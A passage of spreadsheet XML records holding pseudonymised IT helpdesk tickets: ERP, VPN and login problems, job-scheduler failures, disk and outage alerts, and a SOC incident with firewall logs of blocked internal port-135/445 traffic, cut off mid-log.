    <s v="erp can not print by fe08. please help me switch to fe10 print. it is urgent."/>
    <s v="erp can not print by fe08. please help me switch to fe10 print. it is urgent."/>
    <s v="zreijwsb jnrxugpd"/>
    <x v="13"/>
  </r>
  <r>
    <s v="dell battery failure."/>
    <s v="_x000a__x000a_received from: rxoynvgi.ntgdsehl@gmail.com_x000a__x000a_hi ti team_x000a__x000a_need your assistant on the attached issue._x000a__x000a_hydstheud mddwwyleh_x000a_operation supervisor_x000a_company distribution services of asia pte ltd_x000a_( asia regional distribution centre)_x000a__x000a_email : rxoynvgi.ntgdsehl@gmail.com&lt;mailto:rxoynvgi.ntgdsehl@gmail.com&gt;"/>
    <s v="rxoynvgi ntgdsehl"/>
    <x v="18"/>
  </r>
  <r>
    <s v="damaged laptop"/>
    <s v="from: zrpemyab xvzwcbha _x000a_sent: monday, august 15, 2016 7:02 am_x000a_to: nwfodmhc exurcwkm; bmhxwvys tdmgolwn; bmhxwvys tdmgolwn_x000a_subject: rad:fw: damaged laptop_x000a__x000a_dear it help,_x000a__x000a_please help suhrhtyju to sort out issue with his laptop._x000a__x000a_he is based in indonesia_x000a__x000a_his contact details are as mentioned below_x000a__x000a__x000a_suhrhtyju_x000a_application engineer _x000a_bmhxwvys.tdmgolwn@gmail.com_x000a__x000a__x000a__x000a_"/>
    <s v="zrpemyab xvzwcbha"/>
    <x v="18"/>
  </r>
  <r>
    <s v="windows ç³»ç»Ÿæ— æ³•ç™»å½•æç¤ºè®¡ç®—æœºä¸Žä¸»åŸŸä¹‹å‰ä¿¡ä»»å…³ç³»å¤±è´¥"/>
    <s v="windows ç³»ç»Ÿæ— æ³•ç™»å½•æç¤ºè®¡ç®—æœºä¸Žä¸»åŸŸä¹‹å‰ä¿¡ä»»å…³ç³»å¤±è´¥"/>
    <s v="gdyicrel kvtlodsx"/>
    <x v="31"/>
  </r>
  <r>
    <s v="erp purchasing error"/>
    <s v="when i tried to submit the &quot;describe what you need&quot; it shows&quot;no data found for employee '1111154833'; inform system administration&quot; please help with it i have several orders to send outï¼this problem has been existed for a week and no one contact me to solve itï¼"/>
    <s v="kyagjxdh dmtjpbnz"/>
    <x v="29"/>
  </r>
  <r>
    <s v="æ˜¾ç¤ºå™¨ä¸äº®"/>
    <s v="æ—©ä¸Šå¼€æœºåŽæ˜¾ç¤ºå™¨ä¸å‡ºå›¾åƒã€‚"/>
    <s v="wgmqlnzh vpebwoat"/>
    <x v="30"/>
  </r>
  <r>
    <s v="vpn connection issue"/>
    <s v="vpn connection issue_x000d__x000a_-connected to the user system using teamviewer._x000d__x000a_-installed the company vpn drivers._x000d__x000a_-caller confirmed that he was able to login._x000d__x000a_-issue resolved."/>
    <s v="qwreamdz pmarxvtk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_3186"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_3186 at 08/14/16 20:01:28"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="9"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_2114"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_2114 at 08/14/16 17:32:28"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="8"/>
  </r>
  <r>
    <s v="queue 'dmz_all' failed to connect to hub /lhqsm665dom/HostName_772/HostName_772/hub"/>
    <s v="observing below alert in reporting_tool since 7:33 am on 8/14 et after reporting_tool reboot_x000d__x000a__x000d__x000a_queue 'dmz_all' failed to connect to hub /lhqsm665dom/HostName_772/HostName_772/hub"/>
    <s v="jloygrwh acvztedi"/>
    <x v="7"/>
  </r>
  <r>
    <s v="sao-palo-2960-switch-i(45.25.35.049) is down since 8:00 am on 08/14 et"/>
    <s v="sao-palo-2960-switch-i(45.25.35.049) is down since 8:00 am on 08/14 et"/>
    <s v="jloygrwh acvztedi"/>
    <x v="7"/>
  </r>
  <r>
    <s v="error login on to the SID_34 system."/>
    <s v="error login on to the SID_34 system._x000d__x000a_-verified user details.(employee# &amp; manager name)_x000d__x000a_-unlocked and reset the erp id to&quot;daypay3&quot;._x000d__x000a_-caller confirmed that he was able to login._x000d__x000a_-issue resolved."/>
    <s v="mbwgkint wjrokfub"/>
    <x v="0"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: snp_heu_5_regen"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: snp_heu_5_regen at 08/14/16 12:40:30"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="5"/>
  </r>
  <r>
    <s v="problem with sending discount request"/>
    <s v="_x000a__x000a_received from: vkzwafuh.tcjnuswg@gmail.com_x000a__x000a_hi,_x000a_i'm having a problem with sending discount requests. i get the below error when i hit submit request. i had this problem last week but when i connected to vpn it sent the request. i thought the problem was solved but it is still happening. please advise._x000a__x000a_[cid:image001.jpg@01d1f61a.0223ac90]_x000a__x000a_vkzwafuh tcjnuswg - cmp_x000a_sr. application eng._x000a_vkzwafuh.tcjnuswg@gmail.com_x000a__x000a__x000a__x000a_"/>
    <s v="vkzwafuh tcjnuswg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="na production files not received"/>
    <s v="_x000d__x000a__x000d__x000a_received from: rdfjsawg.zpmxgdcw@gmail.com_x000d__x000a__x000d__x000a_assign to  pi  team. files not transferred as per schedule. even last week we had the same problem._x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="rdfjsawg zpmxgdcw"/>
    <x v="71"/>
  </r>
  <r>
    <s v="office 365 sprache Ã¤ndern/ videos aus &quot;thehub&quot; funktionieren nicht."/>
    <s v="hallo, ist es mÃ¶glich das ich office365 von englisch auf deutsch umstelle? wenn ja wo finde ich diese einstellung?_x000d__x000a__x000d__x000a_wenn ich die videos von &quot;lets talk&quot;  in deutsch ansehen mÃ¶chte und diese Ã¼ber den link in der email anklicke sagt er mir:_x000d__x000a__x000d__x000a_office 365 video isn't available _x000d__x000a__x000d__x000a_office 365 video is not enabled by your organization for you. _x000d__x000a__x000d__x000a_hier ein link:_x000d__x000a__x000d__x000a_vielen dank fÃ¼r ihre hilfe"/>
    <s v="xbyudksw zbfxlmus"/>
    <x v="0"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: snp_heu_1_regen"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: snp_heu_1_regen at 08/14/16 05:51:27"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="5"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: bk_hana_SID_62_erp_wly_dp"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: bk_hana_SID_62_erp_wly_dp at 08/14/16 05:03:28"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="7"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: SID_37hoti"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: SID_37hoti at 08/14/16 05:03:28"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="7"/>
  </r>
  <r>
    <s v="HostName_216 (erp-SID_51 aprtgghj4k- production): average (1 samples) disk free on /home is now 13%"/>
    <s v="HostName_216 (erp-SID_51 aprtgghj4k- production):  average (1 samples) disk free on /home is now 13%, which is below the warning threshold (15%) out of total size 0.5 gb"/>
    <s v="dkmcfreg anwmfvlg"/>
    <x v="13"/>
  </r>
  <r>
    <s v="HostName_214 (erp-SID_51 app1-production): average (1 samples) disk free on /home is now 15%"/>
    <s v="HostName_214 (erp-SID_51 app1-production):  average (1 samples) disk free on /home is now 15%, which is below the warning threshold (15%) out of total size 0.5 gb"/>
    <s v="dkmcfreg anwmfvlg"/>
    <x v="13"/>
  </r>
  <r>
    <s v="HostName_768(corporate file server (teams) - production): server is inactive"/>
    <s v="HostName_768(corporate file server (teams) - production): server is inactive"/>
    <s v="dkmcfreg anwmfvlg"/>
    <x v="11"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_1343"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_1343 at 08/14/16 01:39:32"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="8"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: SID_9cold"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: SID_9cold at 08/14/16 01:11:30"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="7"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: SID_23cold"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: SID_23cold at 08/13/16 21:40:28"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="4"/>
  </r>
  <r>
    <s v="network drives disconnected"/>
    <s v="unable to connect to t drive "/>
    <s v="vanteksj astelnqw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: SID_29cold"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: SID_29cold at 08/13/16 20:56:26"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="7"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: SID_32cold"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: SID_32cold at 08/13/16 20:56:26"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="7"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_727"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_727 at 08/13/16 20:53:27"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="7"/>
  </r>
  <r>
    <s v="HostName_1238 ( south_amerirtca, br -plm dsc file - production) dsccache.exe: wrong number of instances of process dsccache.exe"/>
    <s v="HostName_1238 ( south_amerirtca, br -plm dsc file - production) dsccache.exe: wrong number of instances of process dsccache.exe, expected instances gte 1 but found 0 _x000d__x000a__x000d__x000a_note: there was a planned power maintenance at south_amerirtca as per chg1144678 service did not come up after the maintenance._x000d__x000a_"/>
    <s v="jloygrwh acvztedi"/>
    <x v="13"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_717"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_717 at 08/13/16 20:38:26"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="7"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: SID_36cold"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: SID_36cold at 08/13/16 20:23:27"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="7"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_571"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_571 at 08/13/16 20:23:27"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="7"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: SID_48cold"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: SID_48cold at 08/13/16 20:22:26"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="4"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: SID_43cold"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: SID_43cold at 08/13/16 20:16:27"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="4"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: SID_50cold"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: SID_50cold at 08/13/16 20:14:27"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="4"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_737"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_737 at 08/13/16 20:11:27"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="7"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: SID_79cold"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: SID_79cold at 08/13/16 20:11:27"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="4"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: SID_27hot"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: SID_27hot at 08/13/16 20:09:27"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="4"/>
  </r>
  <r>
    <s v="mii login issue"/>
    <s v="mii login issue._x000d__x000a_-verified user details.(employee# &amp; manager name)_x000d__x000a_-checked the user name in ad and reset the password._x000d__x000a_-advised the user to login and check._x000d__x000a_-caller confirmed that she was able to login._x000d__x000a_-issue resolved."/>
    <s v="lbtverxc ymgljuqn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: SID_35cold"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: SID_35cold at 08/13/16 19:15:25"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="7"/>
  </r>
  <r>
    <s v=":i am getting the following message when trying to log in to SID_34. logon balancing error 88:  could not connect to messag"/>
    <s v="name:htsnaodb adjtmlzn_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:karghyuen.hasghyusan@company.como_x000a_customer number:_x000a_telephone:_x000a_summary:i am getting the following message when trying to log in to SID_34. logon balancing error 88:  could not connect to message server.  is erp down right now?"/>
    <s v="htsnaodb adjtmlzn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="HostName_1015: average (4 samples) disk free on m:\ is now 15%, which is below the warning threshold (15%)"/>
    <s v="HostName_1015: average (4 samples) disk free on m:\ is now 15%, which is below the warning threshold (15%) out of total size 139.4 gb"/>
    <s v="vbwszcqn nlbqsuyv"/>
    <x v="11"/>
  </r>
  <r>
    <s v="job in job_scheduler: Job_2080 was running long."/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_2080 was running longer &gt; 60min. kirtyled and restarted."/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="5"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_1989"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_1989 at 08/13/16 06:19:28"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="5"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_1907"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_1907 at 08/13/16 06:18:28"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="5"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_1949"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_1949 at 08/13/16 06:17:28"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="5"/>
  </r>
  <r>
    <s v="reset passwords for jcmxerol nbfyczqr using password_management_tool password reset."/>
    <s v="the"/>
    <s v="jcmxerol nbfyczqr"/>
    <x v="16"/>
  </r>
  <r>
    <s v=" reset microsoft online services password for rdwpangu.lybaxonw@gmail.com"/>
    <s v="from: microsoft on behalf of company inc. [mailto:msonlineservicesteam@microsoftonline.com] _x000a_sent: saturday, august 13, 2016 7:24 am_x000a_to: nwfodmhc exurcwkm_x000a_cc: tiyhum kuyiomar_x000a_subject: rad:request to reset microsoft online services password for rdwpangu.lybaxonw@gmail.com_x000a_importance: high_x000a__x000a_    request to reset user's password   _x000a_   the following user in your organization has requested a password reset be performed for their account: _x000a__x000a_â€¢ rdwpangu.lybaxonw@gmail.com _x000a_â€¢ first name: rolghtyuando _x000a_â€¢ last name: santolgiy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rdwpangu lybaxonw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vpn connection problem"/>
    <s v="_x000d__x000a__x000d__x000a_received from: cobsfvjz.apkqmrdu@gmail.com_x000d__x000a__x000d__x000a_hello_x000d__x000a__x000d__x000a_unable to  connect to vpn ._x000d__x000a__x000d__x000a_get the below message ._x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_[cid:image001.jpg@01d1f566.c5bfdd90]_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="cobsfvjz apkqmrdu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="network outage:cantabria (mecftgobusa) - (kenci) hard down since   2:31 am  8/13/2016 est"/>
    <s v="what type of outage:  ___x__network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    _____no____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   _________2:31 am  8/13/2016 est_____________x000d__x000a__x000d__x000a_3.  scheduled maintenance ( power) ? ___no____    (yes/no/na)     company power  _________     provider power __________x000d__x000a_                _x000d__x000a_4.  scheduled maintenance ( network) ? ____no___    (yes/no/na)     company maint________ (yes/no)       provider maint/ticket #__________________    _x000d__x000a__x000d__x000a_5. does site have a backup circuit ?  ___no___    (yes/no/na) _x000d__x000a__x000d__x000a_6. backup circuit active ?   ___na_____     (yes/no/na) _x000d__x000a__x000d__x000a_7. site contact notified (phone/email) ?  ___email______     (yes/no/na) _x000d__x000a__x000d__x000a_8. remote dial-in ?   ____no_______   (yes/no/na) _x000d__x000a__x000d__x000a_9. equipment reset ?    _____no______    (yes/no/na) _x000d__x000a__x000d__x000a_10. verified site working on backup circuit ?  ___no____     (yes/no/na) _x000d__x000a__x000d__x000a_11. vendor ticket  # ( global_telecom_1, verizon, telecom_vendor_1, telecom_vendor_2 )    __________no_______________       _x000d__x000a__x000d__x000a_12. notified  gsc  ____yes____     (yes/no/na)    cert started  ?___na_____    (yes/no/na) _x000d__x000a__x000d__x000a_13.  additional diagnostics"/>
    <s v="uxgrdjfc kqxdjeov"/>
    <x v="7"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_1148"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_1148 at 08/13/16 01:15:26"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="8"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_1141"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_1141 at 08/12/16 23:45:26"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="8"/>
  </r>
  <r>
    <s v="erp SID_34 account locked "/>
    <s v="erp SID_34 account locked "/>
    <s v="jmuaiqol rmvethkf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="a termination for carlos patino, 11386155, effective 06/30/2016  has been approved"/>
    <s v="from: idelcia almeida nascimento [mailto:system@hr_tool.com] _x000d__x000a_sent: friday, august 12, 2016 9:45 pm_x000d__x000a_to: nwfodmhc exurcwkm_x000d__x000a_subject: rakthyesh the terminate action for carlos patino has completed._x000d__x000a__x000d__x000a_hello , _x000d__x000a__x000d__x000a_a termination for carlos patino, 11386155, effective 06/30/2016  has been approved._x000d__x000a__x000d__x000a_click the link to view._x000d__x000a__x000d__x000a_"/>
    <s v="wsimyhro omhnjqbw"/>
    <x v="19"/>
  </r>
  <r>
    <s v="access denied in adoption scorecard manager"/>
    <s v="user is unable to view adoption scorecard manager in microsoft crm dynamics, please check screenshot"/>
    <s v="xeakyiqt knhjogel"/>
    <x v="22"/>
  </r>
  <r>
    <s v="i should be able to see all my activities in crm what i created in outlook."/>
    <s v="hi,_x000a__x000a__x000a_i was wondering if i should be able to see all my activities in crm what i created in outlook. example  emails, task , appointments? right now i can only see my appointment as you can see below. _x000a__x000a_ _x000a__x000a_ _x000a__x000a_uvrwikmy yusexirn_x000a_sr application technician_x000a_uvrwikmy.yusexirn@gmail.com_x000a__x000a__x000a__x000a__x000a__x000a_"/>
    <s v="uvrwikmy yusexirn"/>
    <x v="22"/>
  </r>
  <r>
    <s v="circuit outage : india, kirty telecom_vendor_1 circuit is down since 07:24pm et on 08/12."/>
    <s v="what type of outage:  _____network     ___x__circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ____yes_____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   _______07:24pm et on 08/12.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x v="7"/>
  </r>
  <r>
    <s v="unable to sign in to collaboration_platform"/>
    <s v="unable to sign in to collaboration_platform"/>
    <s v="uvrwikmy yusexirn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: hr_tooldcvcgenratn"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: hr_tooldcvcgenratn at 08/12/16 17:02:29"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="5"/>
  </r>
  <r>
    <s v="analysis for office issue"/>
    <s v="_x000d__x000a__x000d__x000a_received from: nlearzwi.ukdzstwi@gmail.com_x000d__x000a__x000d__x000a_this has been happening every time i try to filter by customer number in bex or hana. i am using both systems, primarily hana otc_billings_all, but i think the issue is regarding the client._x000d__x000a__x000d__x000a_i have tried filtering by copying and pasting and also by importing a text file with the same result._x000d__x000a__x000d__x000a_any idea how to fix this error? i can't find the log file it references. "/>
    <s v="nlearzwi ukdzstwi"/>
    <x v="8"/>
  </r>
  <r>
    <s v="phone display"/>
    <s v="from: judi elituytt _x000d__x000a_sent: saturday, august 13, 2016 12:06 am_x000d__x000a_to: nmzfdlar whzbrusx; -facility; nwfodmhc exurcwkm_x000d__x000a_subject: amar re: phone display_x000d__x000a__x000d__x000a_hi johthryu â€“ we are forwarding your request to the help desk.  it help desk is the contact for any phone issues.  "/>
    <s v="nmzfdlar whzbrusx"/>
    <x v="36"/>
  </r>
  <r>
    <s v="termination for cyxieuwk rekwlqmu, 00064847"/>
    <s v="hello , _x000d__x000a__x000d__x000a_a termination for cyxieuwk rekwlqmu, 11175958, effective 07/02/2016  has been approved._x000d__x000a__x000d__x000a_click the link to view._x000d__x000a__x000d__x000a_"/>
    <s v="fduinmtw yofhirjs"/>
    <x v="19"/>
  </r>
  <r>
    <s v="HostName_1289: account is locked"/>
    <s v="HostName_1289: account is locked.. please unlock the account._x000d__x000a_username: hq4nopr "/>
    <s v="vbwszcqn nlbqsuyv"/>
    <x v="19"/>
  </r>
  <r>
    <s v="security incidents - ( #in33578632) : suspicious ms-rpc/ms-ds/netbios activity - HostName_17"/>
    <s v="source ip :_x000d__x000a_system name :_x000d__x000a_user  name:_x000d__x000a_location :_x000d__x000a_sep , sms status :_x000d__x000a_field sales user ( yes / no) :  _x000d__x000a_dsw event log:see below_x000d__x000a_=========================================_x000d__x000a__x000d__x000a_ =========================_x000d__x000a_incident overview_x000d__x000a_=========================_x000d__x000a_we have detected at least 236 occurrences of your firewall att-singapore-asa.company.com-1/54.96.80.216 dropping traffic sourcing from HostName_17/29.26.13.3095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_x000d__x000a__x000d__x000a_sincerely,_x000d__x000a_secureworks soc_x000d__x000a_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ring_x000d__x000a__x000d__x000a_additional information on these ports and best practices can be found at the following sites:_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_=========================_x000d__x000a_references_x000d__x000a_=========================_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_=========================_x000d__x000a_event data_x000d__x000a_=========================_x000d__x000a_related events: _x000d__x000a_event id: 91557862_x000d__x000a_event summary: internal outbreak for 135/tcp_x000d__x000a_occurrence count: 236_x000d__x000a_event count: 2_x000d__x000a__x000d__x000a_host and connection information_x000d__x000a_source ip: 29.26.13.3095_x000d__x000a_source hostname: HostName_17_x000d__x000a_source port: 58280_x000d__x000a_destination port: 135_x000d__x000a_connection directionality: internal_x000d__x000a__x000d__x000a_device information_x000d__x000a_device ip: 54.96.80.216_x000d__x000a_device name: att-singapore-asa.company.com-1_x000d__x000a_log time: 2016-08-11 at 19:45:48 utc_x000d__x000a_action: blocked_x000d__x000a_cvss score: -1 _x000d__x000a__x000d__x000a_scwx event processing information_x000d__x000a_sherlock rule id (sle): 537074_x000d__x000a_inspector rule id: 186739_x000d__x000a_inspector event id: 877942065_x000d__x000a_ontology id: 200020003203009162_x000d__x000a_event type id: 200020003203009062_x000d__x000a_agent id: 103955_x000d__x000a__x000d__x000a_event detail:_x000d__x000a_aug 1sartlgeo lhqksbdx9:45:48 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/58280 dst outside:192.168.254.10/135 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_aug 1sartlgeo lhqksbdx9:45:51 54.96.80.216 %asa-2-106001: inbound tcp connection denied from 29.26.13.3095/58285 to 10.59.24.137/135 flags syn on interface inside_x000d__x000a_aug 1sartlgeo lhqksbdx9:45:51 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/58286 dst outside:192.168.54.59/135 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_aug 1sartlgeo lhqksbdx9:45:51 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/58287 dst outside:192.168.1.100/135 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_aug 1sartlgeo lhqksbdx9:45:54 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/58291 dst outside:192.168.1.87/135 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_aug 1sartlgeo lhqksbdx9:45:56 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/58293 dst outside:192.168.0.108/135 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_aug 1sartlgeo lhqksbdx9:45:57 54.96.80.216 %asa-2-106001: inbound tcp connection denied from 29.26.13.3095/58297 to 10.106.15.23/135 flags syn on interface inside_x000d__x000a_aug 1sartlgeo lhqksbdx9:46:02 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/58304 dst outside:192.168.88.104/135 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_aug 1sartlgeo lhqksbdx9:46:28 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/58330 dst outside:192.168.21.253/135 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_aug 1sartlgeo lhqksbdx9:46:28 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/58331 dst outside:192.168.1.182/135 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_aug 1sartlgeo lhqksbdx9:46:29 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/58333 dst outside:192.168.0.109/135 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_aug 1sartlgeo lhqksbdx9:46:31 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/58337 dst outside:192.168.43.163/135 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_aug 1sartlgeo lhqksbdx9:46:34 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/58343 dst outside:192.168.43.140/135 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_aug 1sartlgeo lhqksbdx9:46:36 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/58347 dst outside:217.168.208.218/135 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_aug 1sartlgeo lhqksbdx9:46:40 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/58357 dst outside:192.168.1.13/135 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_aug 1sartlgeo lhqksbdx9:46:42 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/58363 dst outside:192.168.0.103/135 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_event id: 91557863_x000d__x000a_event summary: internal outbreak for 135/tcp_x000d__x000a_occurrence count: 236_x000d__x000a_event count: 2_x000d__x000a__x000d__x000a_host and connection information_x000d__x000a_source ip: 29.26.13.3095_x000d__x000a_source hostname: HostName_17_x000d__x000a_source port: 58280_x000d__x000a_destination port: 135_x000d__x000a_connection directionality: internal_x000d__x000a__x000d__x000a_device information_x000d__x000a_device ip: 54.96.80.216_x000d__x000a_device name: att-singapore-asa.company.com-1_x000d__x000a_log time: 2016-08-11 at 19:45:48 utc_x000d__x000a_action: blocked_x000d__x000a_cvss score: -1 _x000d__x000a__x000d__x000a_scwx event processing information_x000d__x000a_sherlock rule id (sle): 537074_x000d__x000a_inspector rule id: 186739_x000d__x000a_inspector event id: 877942065_x000d__x000a_ontology id: 200020003203009162_x000d__x000a_event type id: 200020003203009062_x000d__x000a_agent id: 103955_x000d__x000a__x000d__x000a_event detail:_x000d__x000a_aug 1sartlgeo lhqksbdx9:45:53 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/58288 dst outside:192.168.54.59/445 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_aug 1sartlgeo lhqksbdx9:45:53 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/58289 dst outside:192.168.1.100/445 by access-group 